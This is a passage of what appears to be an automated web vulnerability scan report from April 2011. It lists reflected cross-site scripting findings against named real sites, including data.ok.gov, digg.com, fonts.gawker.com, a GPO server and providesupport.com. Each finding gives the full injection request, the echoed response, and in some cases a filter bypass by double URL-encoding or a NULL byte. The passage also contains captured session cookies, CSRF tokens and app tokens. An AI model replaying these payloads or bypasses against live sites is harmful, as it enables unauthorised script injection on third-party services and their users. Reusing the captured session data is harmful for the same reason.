X-App-Token: U29jcmF0YS0td2VraWNrYXNz0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=120904477.1304162509.1.1.utmcsr=ok.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27; __utma=120904477.1835992193.1304162509.1304162509.1304162509.1; __utmc=120904477; __utmb=120904477.2.10.1304162509; socrata-csrf-token=iR%2BNktWzrQ%2FEwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk%3D

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 11:22:59 GMT
Server: Apache
X-Error-Code: not_found
X-Error-Message: No service for "/views47fae<script>alert(1)</script>4549fe22511/dz4w-xbzm.json"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 144

{
"code" : "not_found",
"error" : true,
"message" : "No service for \"/views47fae<script>alert(1)</script>4549fe22511/dz4w-xbzm.json\""
}

3.30. http://data.ok.gov/views/dz4w-xbzm.json [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /views/dz4w-xbzm.json

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 15f5f<script>alert(1)</script>140110ceca3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /views/dz4w-xbzm.json15f5f<script>alert(1)</script>140110ceca3?accessType=WEBSITE&method=getDefaultView&_=1304162592421 HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm
X-CSRF-Token: iR+NktWzrQ/EwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk=
X-Requested-With: XMLHttpRequest
X-App-Token: U29jcmF0YS0td2VraWNrYXNz0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=120904477.1304162509.1.1.utmcsr=ok.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27; __utma=120904477.1835992193.1304162509.1304162509.1304162509.1; __utmc=120904477; __utmb=120904477.2.10.1304162509; socrata-csrf-token=iR%2BNktWzrQ%2FEwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk%3D

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 11:23:00 GMT
Server: Apache
X-Error-Code: not_found
X-Error-Message: No service for "/views/dz4w-xbzm.json15f5f<script>alert(1)</script>140110ceca3"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 144

{
"code" : "not_found",
"error" : true,
"message" : "No service for \"/views/dz4w-xbzm.json15f5f<script>alert(1)</script>140110ceca3\""
}

3.31. http://data.ok.gov/views/dz4w-xbzm.json [accessType parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /views/dz4w-xbzm.json

Issue detail

The value of the accessType request parameter is copied into the HTML document as plain text between tags. The payload dd487<script>alert(1)</script>0451757cc11 was submitted in the accessType parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /views/dz4w-xbzm.json?accessType=WEBSITEdd487<script>alert(1)</script>0451757cc11&method=opening&referrer=http%3A%2F%2Fdata.ok.gov%2F HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm
Origin: http://data.ok.gov
X-CSRF-Token: iR+NktWzrQ/EwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk=
X-Requested-With: XMLHttpRequest
X-App-Token: U29jcmF0YS0td2VraWNrYXNz0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=120904477.1304162509.1.1.utmcsr=ok.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27; __utma=120904477.1835992193.1304162509.1304162509.1304162509.1; __utmc=120904477; __utmb=120904477.2.10.1304162509; socrata-csrf-token=iR%2BNktWzrQ%2FEwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk%3D
Content-Length: 0

Response

HTTP/1.1 400 Bad Request
Date: Sat, 30 Apr 2011 11:22:59 GMT
Server: Apache
X-Error-Code: invalid_request
X-Error-Message: Invalid Input: 'WEBSITEdd487<script>alert(1)</script>0451757cc11'
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 134

{
"code" : "invalid_request",
"error" : true,
"message" : "Invalid Input: 'WEBSITEdd487<script>alert(1)</script>0451757cc11'"
}

3.32. http://data.ok.gov/w/dz4w-xbzm/q69b-3vw6 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /w/dz4w-xbzm/q69b-3vw6

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e5d4%2527%253balert%25281%2529%252f%252fbf0a987d411 was submitted in the REST URL parameter 3. This input was echoed as 3e5d4';alert(1)//bf0a987d411 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /w/dz4w-xbzm/q69b-3vw63e5d4%2527%253balert%25281%2529%252f%252fbf0a987d411 HTTP/1.1
Host: data.ok.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: logged_in=; __utmz=120904477.1304162509.1.1.utmcsr=ok.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; socrata-csrf-token=iR%2BNktWzrQ%2FEwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk%3D; __utma=120904477.1835992193.1304162509.1304162509.1304162509.1; __utmc=120904477; __utmb=120904477.3.9.1304162592440; _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:20:49 GMT
Server: Apache
ETag: "5e71223ce2a2fc54bd7a852be2cc895e"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: logged_in=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27; path=/; HttpOnly
Content-Length: 54893
Status: 200
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<!--[if lte IE 6]><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="
...[SNIP]...
":2,"display_name":"Publishing"},"activity":{"show":true,"order":3,"display_name":"Activity"},"summary":{"show":true,"order":4,"display_name":"Summary"}}};
blist.widget.customizationId = 'q69b-3vw63e5d4';alert(1)//bf0a987d411';
blist.widget.enabledModules = {"allow_comments":false};
</script>
...[SNIP]...

3.33. http://digg.com/submit [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00c85df"><script>alert(1)</script>17c823d3499 was submitted in the REST URL parameter 1. This input was echoed as c85df"><script>alert(1)</script>17c823d3499 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /submit%00c85df"><script>alert(1)</script>17c823d3499 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:20:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=-779404137262479208%3A203; expires=Sun, 01-May-2011 12:20:27 GMT; path=/; domain=digg.com
Set-Cookie: d=b60ad842c047fafa1d59aadf9b298fb4159420a84c636adc57b031f514698993; expires=Thu, 29-Apr-2021 22:28:07 GMT; path=/; domain=.digg.com
X-Digg-Time: D=990255 10.2.129.3
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16976

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%00c85df"><script>alert(1)</script>17c823d3499.rss">
...[SNIP]...

3.34. http://fonts.gawker.com/k/zvc4iwz-c-6179963-143.eot [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.gawker.com
Path:   /k/zvc4iwz-c-6179963-143.eot

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8d230<script>alert(1)</script>1efb78a005f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k8d230<script>alert(1)</script>1efb78a005f/zvc4iwz-c-6179963-143.eot?3bb2a6e53c9684ffdc9a98f3125b2a626c095928039adb8cca8e16c915a159b0f3c8d256a5ec264208bbf5cbd1783600e65386356fa35d50982087f520acbb9763065409424973295f46d8d9db605d324f45829106861751ccba125a79487b746ad1ec2508547ea754a6edb66e38116953b75739dfe7f6f95a3018b5ce990280ee1d258bc715dd5bbcf830e9831cdd9209903a493236912cbfcda237a49fcd46a4cd122c6d741bbd7614db135bb3b420f1e3ebf246bcad7673a1494255af32690eff20cde61fbdaf8132c6201d88ad4a6e2d879073b84c58b4ba30a25390f9b8d872313c611595ee7d571ff19bba591cf054af39838148f48644b1c65b49804518c7 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: fonts.gawker.com

Response

HTTP/1.1 404 Not Found
Content-Type: text/plain
Date: Sat, 30 Apr 2011 12:17:45 GMT
Server: nginx/0.8.36
X-Runtime: 0.000716
Content-Length: 80

Not Found: /k8d230<script>alert(1)</script>1efb78a005f/zvc4iwz-c-6179963-143.eot

3.35. http://fonts.gawker.com/k/zvc4iwz-c-6179963-143.eot [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.gawker.com
Path:   /k/zvc4iwz-c-6179963-143.eot

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3bc80<script>alert(1)</script>e38aeaf411d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k/zvc4iwz-c-6179963-143.eot3bc80<script>alert(1)</script>e38aeaf411d?3bb2a6e53c9684ffdc9a98f3125b2a626c095928039adb8cca8e16c915a159b0f3c8d256a5ec264208bbf5cbd1783600e65386356fa35d50982087f520acbb9763065409424973295f46d8d9db605d324f45829106861751ccba125a79487b746ad1ec2508547ea754a6edb66e38116953b75739dfe7f6f95a3018b5ce990280ee1d258bc715dd5bbcf830e9831cdd9209903a493236912cbfcda237a49fcd46a4cd122c6d741bbd7614db135bb3b420f1e3ebf246bcad7673a1494255af32690eff20cde61fbdaf8132c6201d88ad4a6e2d879073b84c58b4ba30a25390f9b8d872313c611595ee7d571ff19bba591cf054af39838148f48644b1c65b49804518c7 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: fonts.gawker.com

Response

HTTP/1.1 404 Not Found
Content-Type: text/plain
Date: Sat, 30 Apr 2011 12:17:49 GMT
Server: nginx/0.8.36
X-Runtime: 0.001059
Content-Length: 80

Not Found: /k/zvc4iwz-c-6179963-143.eot3bc80<script>alert(1)</script>e38aeaf411d

3.36. http://fonts.gawker.com/k/zvc4iwz-c-6179963-147.eot [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.gawker.com
Path:   /k/zvc4iwz-c-6179963-147.eot

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bf0cf<script>alert(1)</script>0d7a4e436fb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /kbf0cf<script>alert(1)</script>0d7a4e436fb/zvc4iwz-c-6179963-147.eot?3bb2a6e53c9684ffdc9a98f3125b2a626c095928039adb8cca8e16c915a159b0f3c8d256a5ec264208bbf5cbd1783600e65386356fa35d50982087f520acbb9763065409424973295f46d8d9db605d324f45829106861751ccba125a79487b746ad1ec2508547ea754a6edb66e38116953b75739dfe7f6f95a3018b5ce990280ee1d258bc715dd5bbcf830e9831cdd9209903a493236912cbfcda237a49fcd46a4cd122c6d741bbd7614db135bb3b420f1e3ebf246bcad7673a1494255af32690eff20cde61fbdaf8132c6201d88ad4a6e2d879073b84c58b4ba30a25390f9b8d872313c611595ee7d571ff19bba591cf054af39838148f48644b1c65b49804518c7 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: fonts.gawker.com

Response

HTTP/1.1 404 Not Found
Content-Type: text/plain
Date: Sat, 30 Apr 2011 12:17:41 GMT
Server: nginx/0.8.36
X-Runtime: 0.001864
Content-Length: 80

Not Found: /kbf0cf<script>alert(1)</script>0d7a4e436fb/zvc4iwz-c-6179963-147.eot

3.37. http://fonts.gawker.com/k/zvc4iwz-c-6179963-147.eot [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.gawker.com
Path:   /k/zvc4iwz-c-6179963-147.eot

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 813a5<script>alert(1)</script>f0b8d2f525 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k/zvc4iwz-c-6179963-147.eot813a5<script>alert(1)</script>f0b8d2f525?3bb2a6e53c9684ffdc9a98f3125b2a626c095928039adb8cca8e16c915a159b0f3c8d256a5ec264208bbf5cbd1783600e65386356fa35d50982087f520acbb9763065409424973295f46d8d9db605d324f45829106861751ccba125a79487b746ad1ec2508547ea754a6edb66e38116953b75739dfe7f6f95a3018b5ce990280ee1d258bc715dd5bbcf830e9831cdd9209903a493236912cbfcda237a49fcd46a4cd122c6d741bbd7614db135bb3b420f1e3ebf246bcad7673a1494255af32690eff20cde61fbdaf8132c6201d88ad4a6e2d879073b84c58b4ba30a25390f9b8d872313c611595ee7d571ff19bba591cf054af39838148f48644b1c65b49804518c7 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: fonts.gawker.com

Response

HTTP/1.1 404 Not Found
Content-Type: text/plain
Date: Sat, 30 Apr 2011 12:17:44 GMT
Server: nginx/0.8.36
X-Runtime: 0.001129
Content-Length: 79

Not Found: /k/zvc4iwz-c-6179963-147.eot813a5<script>alert(1)</script>f0b8d2f525

3.38. http://fonts.gawker.com/k/zvc4iwz-c.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.gawker.com
Path:   /k/zvc4iwz-c.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 605a9<script>alert(1)</script>86a4621de3c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k605a9<script>alert(1)</script>86a4621de3c/zvc4iwz-c.css?3bb2a6e53c9684ffdc9a98f3125b2a626c095928039adb8cca8e16c915a159b0f3c8d256a5ec264208bbf5cbd1783600e65386356fa35d50982087f520acbb9763065409424973295f46d8d9db605d324f45829106861751ccba125a79487b746ad1ec2508547ea754a6edb66e38116953b75739dfe7f6f95a3018b5ce990280ee1d258bc715dd5bbcf830e9831cdd9209903a493236912cbfcda237a49fcd46a4cd122c6d741bbd7614db135bb3b420f1e3ebf246bcad7673a1494255af32690eff20cde61fbdaf8132c6201d88ad4a6e2d879073b84c58b4ba30a25390f9b8d872313c611595ee7d571ff19bba591cf054af39838148f48644b1c65b49804518c7 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: fonts.gawker.com

Response

HTTP/1.1 404 Not Found
Content-Type: text/plain
Date: Sat, 30 Apr 2011 12:16:37 GMT
Server: nginx/0.8.36
X-Runtime: 0.001229
Content-Length: 68

Not Found: /k605a9<script>alert(1)</script>86a4621de3c/zvc4iwz-c.css

3.39. http://fonts.gawker.com/k/zvc4iwz-c.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.gawker.com
Path:   /k/zvc4iwz-c.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d5b02<script>alert(1)</script>513a81272f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k/zvc4iwz-c.cssd5b02<script>alert(1)</script>513a81272f?3bb2a6e53c9684ffdc9a98f3125b2a626c095928039adb8cca8e16c915a159b0f3c8d256a5ec264208bbf5cbd1783600e65386356fa35d50982087f520acbb9763065409424973295f46d8d9db605d324f45829106861751ccba125a79487b746ad1ec2508547ea754a6edb66e38116953b75739dfe7f6f95a3018b5ce990280ee1d258bc715dd5bbcf830e9831cdd9209903a493236912cbfcda237a49fcd46a4cd122c6d741bbd7614db135bb3b420f1e3ebf246bcad7673a1494255af32690eff20cde61fbdaf8132c6201d88ad4a6e2d879073b84c58b4ba30a25390f9b8d872313c611595ee7d571ff19bba591cf054af39838148f48644b1c65b49804518c7 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: fonts.gawker.com

Response

HTTP/1.1 404 Not Found
Content-Type: text/plain
Date: Sat, 30 Apr 2011 12:16:41 GMT
Server: nginx/0.8.36
X-Runtime: 0.000829
Content-Length: 67

Not Found: /k/zvc4iwz-c.cssd5b02<script>alert(1)</script>513a81272f

3.40. http://frwebgate.access.gpo.gov/cgi-bin/getdoc.cgi [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://frwebgate.access.gpo.gov
Path:   /cgi-bin/getdoc.cgi

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6f6ed<script>alert(1)</script>087b8e52043 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/getdoc.cgi?6f6ed<script>alert(1)</script>087b8e52043=1 HTTP/1.1
Host: frwebgate.access.gpo.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:20:42 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11294

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/secondarypage.dwt" codeOutsideHTMLIsLocke
...[SNIP]...
<H1>Invalid variable in query string [6f6ed<script>alert(1)</script>087b8e52043=]<PRE>
...[SNIP]...

3.41. http://image.providesupport.com/cmd/hic [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /cmd/hic

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 517d6<script>alert(1)</script>73d0c14f42b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmd517d6<script>alert(1)</script>73d0c14f42b/hic?ps_t=1304201425960&ps_l=http%3A//www.ehawaii.gov/dakine/index.html&ps_r=http%3A//hawaii.gov/&ps_s=QfuX2q273YN8 HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.ehawaii.gov/dakine/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vsid=QfuX2q273YN8

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Sat, 30 Apr 2011 22:10:04 GMT
Content-Length: 562

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
File: /cmd517d6<script>alert(1)</script>73d0c14f42b/hic?ps_t=1304201425960&ps_l=http://www.ehawaii.gov/dakine/index.html&ps_r=http://hawaii.gov/&ps_s=QfuX2q273YN8
</pre>
...[SNIP]...

3.42. http://image.providesupport.com/js/hic/safe-standard.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/hic/safe-standard.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 53eab<script>alert(1)</script>d1c17481add was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js53eab<script>alert(1)</script>d1c17481add/hic/safe-standard.js?ps_h=Mygb&ps_t=1304201424421&online-image=http%3A//www.ehawaii.gov/dakine/images/portal-online.gif&offline-image=http%3A//www.ehawaii.gov/dakine/images/portal-offline.gif HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.ehawaii.gov/dakine/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Sat, 30 Apr 2011 22:10:05 GMT
Content-Length: 574

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
File: /js53eab<script>alert(1)</script>d1c17481add/hic/safe-standard.js?ps_h=Mygb&ps_t=1304201424421&online-image=http://www.ehawaii.gov/dakine/images/portal-online.gif&offline-image=http://www.ehawaii.gov/dakine/images/portal-offline.gif
</pre>
...[SNIP]...

3.43. http://image.providesupport.com/js/hic/safe-standard.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://image.providesupport.com
Path:   /js/hic/safe-standard.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ce743<a>741cad1e216 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /js/hicce743<a>741cad1e216/safe-standard.js?ps_h=Mygb&ps_t=1304201424421&online-image=http%3A//www.ehawaii.gov/dakine/images/portal-online.gif&offline-image=http%3A//www.ehawaii.gov/dakine/images/portal-offline.gif HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.ehawaii.gov/dakine/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Sat, 30 Apr 2011 22:10:05 GMT
Content-Length: 556

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
Page: /js/hicce743<a>741cad1e216/safe-standard.js?ps_h=Mygb&ps_t=1304201424421&online-image=http%3A//www.ehawaii.gov/dakine/images/portal-online.gif&offline-image=http%3A//www.ehawaii.gov/dakine/images/portal-offline.gif
</pre>
...[SNIP]...

3.44. http://image.providesupport.com/js/hic/safe-standard.js [offline-image parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://image.providesupport.com
